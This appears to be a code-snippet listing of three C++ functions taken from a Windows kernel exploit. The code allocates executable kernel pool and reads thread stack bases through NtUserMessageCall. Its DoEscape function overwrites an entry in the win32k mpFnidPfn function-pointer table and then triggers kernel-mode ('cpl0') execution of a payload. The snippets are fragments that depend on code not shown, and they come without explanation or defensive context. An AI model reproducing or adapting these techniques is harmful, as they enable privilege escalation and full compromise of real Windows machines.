Example #1
0
	__checkReturn
	void*
	ExAllocateRwePool(
		__in size_t size
		)
	{
		return NtUserMessageCall(m_window->Hwnd(), size, 0, 0, 0, EX_ALLOCATE_POOL);
	}
Example #2
0
	__checkReturn
	bool
	DoEscape(
		__in const void* kernelImage,
		__inout extinterface::PACKET& packet
		)
	{
		auto stack_base = GetCurrentThreadStackBase();
		if (!stack_base)
			return false;

		void* ace = RELLOCATE(SystemMain, CDllModule::ModuleBase(), kernelImage);
		if (!m_io.Write(&m_win32k->mpFnidPfn()[UNUSED_IND + ACE - 1], &ace, sizeof(ace)))
			return false;

		if (!m_io.Write(static_cast<char*>(stack_base) - sizeof(packet), &packet, sizeof(packet)))
			return false;

		//cpl0 exec :
		(void)NtUserMessageCall(m_window->Hwnd(), DEFAULT_PARAM, 0, 0, 0, ACE);
		return true;
	}
Example #3
0
	__checkReturn
	void*
	GetCurrentThreadStackBase()
	{
		return NtUserMessageCall(m_window->Hwnd(), DEFAULT_PARAM, 0, 0, 0, PS_GET_CURRENT_THREAD_STACK_BASE);
	}